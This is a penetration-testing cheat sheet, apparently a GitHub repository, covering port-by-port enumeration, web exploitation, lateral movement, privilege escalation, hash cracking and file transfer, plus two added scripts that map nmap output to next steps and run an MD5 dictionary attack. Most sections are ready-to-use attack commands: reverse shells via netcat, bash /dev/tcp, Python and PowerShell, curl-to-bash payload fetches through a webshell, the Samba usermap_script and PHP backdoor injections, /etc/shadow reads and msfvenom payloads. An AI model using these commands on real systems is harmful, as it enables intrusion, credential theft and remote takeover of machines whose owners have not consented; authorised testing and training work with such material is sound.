jwardsmith / Penetration-Testing



Penetration Testing

Overview

#1. - Enumeration

  • Nmap
$ nmap -sC -sV -p- -Pn -A <IP address>
$ nmap -sC -sV -p- -Pn -A -sU <IP address> (a full UDP sweep is very slow; start with -sU --top-ports=100)
$ nmap --top-ports=100 <IP address>
$ nmap <IP address> --script vuln
  • FTP (port 21)
$ ftp <IP address> (anonymous:anonymous)
ftp> dir
ftp> get <file>
ftp> put <file>
  • SSH (port 22)
$ ssh <user>@<IP address>
  • Telnet (port 23)
$ telnet <IP address>
  • TFTP (udp/port 69)
$ tftp <IP address>
tftp> get <file>
tftp> put <file>
  • HTTP/HTTPS (port 80/443)
$ gobuster dir -w <wordlist> -u <URL>
$ gobuster dir -w <wordlist> -u <URL> -x php,html
$ gobuster vhost -w <wordlist> -u <URL>
$ ffuf -u <URL>/FUZZ -w <wordlist>
$ curl -I <URL>
$ curl <URL> -H 'User-Agentt: zerodiumsystem("curl <IP address>");' (PHP 8.1.0-dev backdoor, see Exploits below)
$ feroxbuster -w <wordlist> -u <URL>
$ wfuzz -c -w <wordlist> -u http://FUZZ.<domain>
$ nikto -h <IP address>
$ curl -v -X OPTIONS <IP address>
$ curl http://<IP address> --upload-file test.txt
$ curl -X PUT http://<IP address>/test.txt -d @test.txt
$ curl -X PUT http://<IP address>/test.txt --data-binary @cmdasp.aspx 
$ curl -X PUT http://<IP address>/test.txt -d @cmdasp.aspx 
$ curl -X MOVE -H 'Destination:http://<IP address>/cmdasp.aspx' http://<IP address>/test.txt
$ davtest -url http://<IP address>
$ cadaver http://<IP address>
dav:/> put cmdasp.aspx cmdasp.txt
dav:/> move cmdasp.txt cmdasp.aspx
  • SNMP (udp/port 161)
$ snmpwalk -v 2c -c <community string> <IP address>
$ snmpwalk -v 2c -c <community string> <IP address> .1.3.6.1.4.1.11.2.3.9.1.1.13.0
  • SMB (port 445)
$ smbclient -L <IP address>
$ smbclient -L <IP address> -U <username>
$ smbclient \\\\<IP address>\\c$
$ smbclient \\\\<IP address>\\c$ -U <username>
$ smbmap -H <IP address>
$ smbmap -H <IP address> -u <username> -p <password>
smb: \> logon "/=`nc <IP address> <port> -e /bin/sh`" (Samba usermap_script, CVE-2007-2447)
msf> use auxiliary/scanner/smb/smb_version
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> use exploit/windows/smb/ms08_067_netapi
msf> use exploit/multi/samba/usermap_script
$ enum4linux -a <IP address>
$ crackmapexec smb <IP address> --shares
$ crackmapexec smb <IP address> --shares -u <username> -p '<password>'
$ crackmapexec winrm <IP address> -u <username> -p '<password>'
  • CUPS (port 631)
$ cupsctl ErrorLog="/etc/shadow"
$ curl http://<IP address>:631/admin/log/error_log?
use multi/escalate/cups_root_file_read
  • Rsync (port 873)
$ rsync --list-only <IP address>::
$ rsync --list-only <IP address>::<share>
$ rsync <IP address>::<share>/<filename> <filename>
  • MSSQL (port 1433)
$ python3 mssqlclient.py <domain>/<username>@<IP address> -windows-auth
SQL> SELECT is_srvrolemember('sysadmin');
SQL> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
SQL> EXEC xp_cmdshell 'whoami';
  • MySQL (port 3306)
$ mysql -h <IP address> -u root
MariaDB [(none)]> SHOW databases;
MariaDB [(none)]> USE <database name>;
MariaDB [(none)]> SHOW tables;
MariaDB [(none)]> SELECT * FROM <table name>;
  • RDP (port 3389)
$ xfreerdp /v:<IP address>
$ xfreerdp /v:<IP address> /u:Administrator
$ xfreerdp /v:<IP address> /cert:ignore /u:Administrator /p:<password>
  • PostgreSQL (port 5432)
$ psql -h <IP address> -U <username> -d <database> (psql's -p is the port, not the password; enter it at the prompt or set PGPASSWORD=<password>)
postgres=# \l
postgres=# \c <database>
<database>=# \dt
<database>=# SELECT * FROM <table>;
  • WinRM (port 5985)
$ evil-winrm -i <IP address> -u <username> -p <password>
  • Redis (port 6379)
$ redis-cli -h <IP address>
<IP address>:6379> select <db number e.g. 0>
<IP address>:6379> keys *
<IP address>:6379> get <key>
  • MongoDB (port 27017/27117)
$ ./mongo mongodb://<IP address>:27017
> show dbs;
> use <db name>;
> show collections;
> db.<collection>.find().pretty();
$ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
$ mkpasswd -m sha-512 <new password> (produces the SHA-512 crypt hash written into x_shadow below)
$ mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("<Object ID>")},{$set:{"x_shadow":"<SHA-512 hash>"}})'
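The Enumeration list above is, in practice, driven by the Nmap output: each open port points at one of the per-service commands. The script below is an added example, not part of the original cheat sheet, that parses `nmap -oG` (grepable) output and prints the matching enumeration command for every open port. The scan output in NMAP_GREPABLE is constructed for the example and the host 10.10.10.5 is a placeholder.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: turn `nmap -oG` (grepable)
# output into a worklist of the per-service enumeration commands listed above.
# NMAP_GREPABLE below is a constructed sample scan, not real output.

NMAP_GREPABLE="$(printf '# Nmap 7.94 scan initiated as: nmap -sV -oG - 10.10.10.5\nHost: 10.10.10.5 ()\tStatus: Up\nHost: 10.10.10.5 ()\tPorts: 21/open/tcp//ftp//Microsoft ftpd/, 80/open/tcp//http//Microsoft IIS httpd 7.5/, 445/open/tcp//microsoft-ds//, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (996)\n# Nmap done -- 1 IP address (1 host up) scanned')"

# stdin: grepable nmap output; stdout: "host port service" for every open port.
# Each entry in the Ports: field is port/state/proto/owner/service/rpc/version/
open_ports() {
    awk -F'\t' '/^Host:/ && /Ports:/ {
        split($1, h, " "); host = h[2]
        for (i = 2; i <= NF; i++) if ($i ~ /^Ports: /) ports = substr($i, 8)
        n = split(ports, p, ", ")
        for (j = 1; j <= n; j++) {
            split(p[j], f, "/")
            if (f[2] == "open") print host, f[1], f[5]
        }
    }'
}

# Map an open port to the enumeration command this cheat sheet uses for it.
next_step() {   # $1 host, $2 port, $3 service name as reported by nmap
    case "$2/$3" in
        21/ftp)          echo "ftp $1   (try anonymous:anonymous)" ;;
        22/ssh)          echo "ssh <user>@$1" ;;
        443/*)           echo "gobuster dir -w <wordlist> -u https://$1 -x php,html; nikto -h $1" ;;
        */http|*/https|*/http-*) echo "gobuster dir -w <wordlist> -u http://$1:$2 -x php,html; nikto -h $1" ;;
        161/snmp)        echo "snmpwalk -v 2c -c public $1" ;;
        139/*|445/*)     echo "smbclient -L $1; enum4linux -a $1; crackmapexec smb $1 --shares" ;;
        1433/*)          echo "mssqlclient.py <domain>/<user>@$1 -windows-auth" ;;
        3306/*)          echo "mysql -h $1 -u root" ;;
        3389/*)          echo "xfreerdp /v:$1 /cert:ignore /u:Administrator" ;;
        5432/*)          echo "psql -h $1 -U postgres" ;;
        5985/*)          echo "evil-winrm -i $1 -u <user> -p <password>" ;;
        6379/*)          echo "redis-cli -h $1" ;;
        27017/*|27117/*) echo "mongo mongodb://$1:$2" ;;
        *)               echo "nmap -sC -sV -p $2 $1   (no playbook entry for $3)" ;;
    esac
}

worklist() {    # stdin: grepable nmap output; stdout: one command per open port
    open_ports | while read -r host port svc; do
        printf '%s:%s %s -> %s\n' "$host" "$port" "$svc" "$(next_step "$host" "$port" "$svc")"
    done
}

# Demo on the constructed scan: filtered 3389 is skipped, the three open ports get commands.
printf '%s\n' "$NMAP_GREPABLE" | worklist
```

Run a real scan with `nmap -sV -oG scan.gnmap <IP address>` and pipe the file into `worklist`; the `*)` branch flags services the playbook does not cover so they are not silently dropped.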

#2. - Exploitation

  • Local File Inclusion (LFI)
http://<domain name>/<page>?page=../../../../../../../../windows/system32/drivers/etc/hosts
  • Remote File Inclusion (RFI)
sudo responder -I <network interface>
http://<domain name>/<page>?page=//<IP address>/somefile
  • Server Side Template Injection (SSTI)
${7*7}
{{7*7}} (a response containing 49 means the template engine evaluated the expression)
  • Insecure Direct Object Reference (IDOR)
http://<IP address>/data/0
http://<IP address>/data/1
http://<IP address>/data/2
  • Webshell
http://<domain name>/shell.php?cmd=id
http://<domain name>/shell.php?cmd=curl%20<IP address>:8000/shell.sh|bash
  • Sqlmap
$ sqlmap -u '<URL>' --cookie="PHPSESSID=<PHPSESSID>"
$ sqlmap -u '<URL>' --cookie="PHPSESSID=<PHPSESSID>" --os-shell
  • Rogue-JNDI
$ java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,<base64 payload>}|{base64,-d}|{bash,-i}" --hostname "<IP address>" (no spaces in the command string: the {a,b} brace expansions stand in for them)
  • Tomcat
http://<IP address>:<port>/manager/html
tomcat:s3cret
use exploit/multi/http/tomcat_mgr_upload
  • PRTG Network Monitor
C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.dat
https://github.com/shk0x/PRTG-Network-Monitor-RCE/blob/master/prtg-exploit.sh
use exploit/windows/http/prtg_authenticated_rce

#3. - Lateral Movement

  • Local Port Forwarding
$ ssh -L 1234:localhost:5432 <username>@<remote IP address>
  • Dynamic Port Forwarding
$ ssh -D 1234 <username>@<remote IP address>
  • Proxychains
Edit /etc/proxychains4.conf
$ proxychains <command>
  • Chisel
https://github.com/jpillora/chisel
$ sudo ./chisel server -p 8000 --reverse
$ ./chisel client <IP address>:8000 R:631:127.0.0.1:631
  • Socat
$ socat tcp-listen:9090,fork tcp:127.0.0.1:631 &
  • Meterpreter
meterpreter> portfwd add -l 8082 -p 631 -r 127.0.0.1
  • PsExec
$ python psexec.py <username>:<password>@<IP address>
$ python psexec.py <username>@<IP address>

#4. - Privilege Escalation

  • Sudo
$ sudo -l
$ sudo -u <user> /bin/bash
  • SUID
https://github.com/Anon-Exploiter/SUID3NUM
  • WinPEAS
https://github.com/carlospolop/PEASS-ng
  • LinPEAS
https://github.com/carlospolop/PEASS-ng
  • LinEnum
https://github.com/rebootuser/LinEnum
  • Capabilities
$ getcap -r / 2>/dev/null
CAP_SETUID
  • Python
>>> import os
>>> os.setuid(0)
>>> os.system("/bin/bash")
$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
  • Weak Service
C:\> sc.exe config <service> binPath= "C:\Windows\Temp\nc.exe -e cmd.exe <IP address> <port>" (the space after binPath= is required)
C:\> sc.exe stop <service>
C:\> sc.exe start <service>
  • Whoami
C:\> whoami /priv
  • Windows Exploit Suggester
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
(On Kali) $ ./windows-exploit-suggester.py --update
$ pip install xlrd==1.2.0 (the script is Python 2 and reads the .xlsx bulletin database; xlrd 2.x dropped .xlsx support)

Feed it the output of "systeminfo" from the target and point it at the Microsoft bulletin database downloaded by --update:
$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
  • Metasploit
msf> use post/multi/recon/local_exploit_suggester

#5. - Brute Force

  • HashID
$ hashid -m <hash> (-m also prints the matching hashcat mode)
  • John The Ripper
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
$ john --show hash.txt
  • Hydra
$ hydra -L <usernames.txt> -p '<password>' <IP address> ssh
  • Zip2john
$ zip2john <ZIP file> > hashes.txt
  • Hashcat
$ hashcat -a 0 -m <mode> hashes.txt <wordlist> (-a 0 = wordlist attack; -m 0 = MD5, 1000 = NTLM, 1800 = sha512crypt)
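The Brute Force list above is three tools chained together: identify the hash, then run a wordlist against it. The script below is an added example, not part of the original cheat sheet, that does both in plain POSIX sh: a prefix/length heuristic in the style of hashid that names the algorithm and hashcat mode, and a dictionary attack in the shape of `hashcat -a 0 -m 0`. The five-word WORDLIST is a constructed stand-in for rockyou.txt, and the target hash is computed from one of its words so the script checks itself.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: a minimal dictionary attack
# in the shape of "hashcat -a 0 -m 0 hashes.txt <wordlist>", plus the prefix /
# length heuristic hashid applies to name the algorithm and hashcat mode.
# WORDLIST is a constructed five-entry stand-in for rockyou.txt, and TARGET is
# computed from one of its words so the script is self-checking.

WORDLIST='123456
password
letmein
s3cret
Summer2023!'

guess_hash_type() {   # $1 = hash -> algorithm guess with the hashcat -m value
    case "$1" in
        '$6$'*)                      echo 'sha512crypt (hashcat -m 1800)' ;;
        '$1$'*)                      echo 'md5crypt (hashcat -m 500)' ;;
        '$2a$'*|'$2b$'*|'$2y$'*)     echo 'bcrypt (hashcat -m 3200)' ;;
        *)  # unsalted hex digests are only distinguishable by length
            case ${#1} in
                32)  echo 'MD5 or NTLM (hashcat -m 0 / -m 1000)' ;;
                40)  echo 'SHA-1 (hashcat -m 100)' ;;
                64)  echo 'SHA-256 (hashcat -m 1400)' ;;
                128) echo 'SHA-512 (hashcat -m 1700)' ;;
                *)   echo 'unknown' ;;
            esac ;;
    esac
}

md5_of() {   # $1 = plaintext -> lowercase hex MD5 (no trailing newline is hashed)
    if command -v md5sum >/dev/null 2>&1; then
        printf '%s' "$1" | md5sum | cut -d' ' -f1
    else
        printf '%s' "$1" | md5 -q        # BSD/macOS
    fi
}

crack_md5() {   # $1 = target MD5 hex; stdin = wordlist -> prints the match, exit 1 if none
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(md5_of "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done
    return 1
}

TARGET=$(md5_of 's3cret')        # constructed target: md5("s3cret")
echo "hash type: $(guess_hash_type "$TARGET")"
if cracked=$(printf '%s\n' "$WORDLIST" | crack_md5 "$TARGET"); then
    echo "cracked: $TARGET -> $cracked"
else
    echo "not in wordlist"
fi
```

Against a real hash, replace TARGET with the value from the dump and feed `/usr/share/wordlists/rockyou.txt` on stdin; the length heuristic cannot tell MD5 from NTLM, which is exactly why hashcat needs the mode given explicitly.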

#6. - File Transfers

  • Host Files
$ nc -nlvp 443 < file.txt
$ python -m SimpleHTTPServer 80
$ python3 -m http.server 8000
$ smbserver.py -smb2support a /usr/share/windows-binaries/
  • Download Files
$ nc -nv <IP address> 443 > file.txt
$ wget http://<IP address>:8000/exploit.sh
$ curl http://<IP address>:8000/exploit.sh | bash
C:\> copy \\<IP address>\a\whoami.exe C:\Windows\Temp\whoami.exe
C:\> powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://<IP address>/exploit.exe','C:\Users\Offsec\Desktop\new-exploit.exe')"

#7. - Restricted Shell Escapes

  • Shell Escapes
$ bash -i
$ python -c "import os; os.system('/bin/bash')"
$ python -c 'import pty; pty.spawn("/bin/bash")'
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ script /dev/null -c bash
  • Fully Interactive TTY (tab completion, Ctrl-C, job control)
After spawning a pty with one of the commands above, background the shell with CTRL+Z, then:
$ stty raw -echo; fg
$ reset
$ export TERM=xterm-256color

#8. - Reverse Shells

  • Reverse Shells
$ nc -nv <IP address> <port> -e /bin/bash
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP address> <port> >/tmp/f
$ bash -i >& /dev/tcp/<IP address>/<port> 0>&1
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP address>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
$ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<IP address>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
$ socat file:`tty`,raw,echo=0 tcp-listen:4444
$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP address>:4444
msf> use exploit/multi/handler

MSFvenom

http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Edit IP address and port

$ msfvenom -p php/reverse_php LHOST=<IP address> LPORT=<Port> -f raw > shell.php
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP address> LPORT=<Port> -f raw > shell.php
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP address> LPORT=<Port> -f asp > shell.asp
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP address> LPORT=<Port> -f aspx > shell.aspx
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP Address> LPORT=<Port> -f raw > shell.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP Address> LPORT=<Port> -f war > shell.war
$ msfvenom -p windows/shell_reverse_tcp LHOST=<IP Address> LPORT=<Port> -f exe -o shell.exe

#9 - Online Resources

  • Speedguide
https://www.speedguide.net/port.php?port=3389
  • CrackStation
https://crackstation.net/
  • Living Off The Land Binaries, Scripts and Libraries (LOLBAS)
https://lolbas-project.github.io/
  • GTFOBins
https://gtfobins.github.io/

#10 - Browser Plugins

  • Wappalyzer: Website technology analyser
https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
  • Cookie Editor: edit cookies
https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/
  • FoxyProxy: proxy management
https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

#11 - Exploits

  • MS17-010
https://github.com/worawit/MS17-010/blob/master/zzz_exploit.py
$ ./zzz_exploit.py <IP address> ntsvcs
https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py
https://github.com/3ndG4me/AutoBlue-MS17-010
  • MS08-067
https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py
  • CVE-2007-2447
https://github.com/amriunix/CVE-2007-2447
  • PHP 8.1.0-dev Backdoor Remote Code Execution
https://github.com/flast101/php-8.1.0-dev-backdoor-rce
  • CVE-2021-4034
https://github.com/joeammond/CVE-2021-4034/blob/main/CVE-2021-4034.py
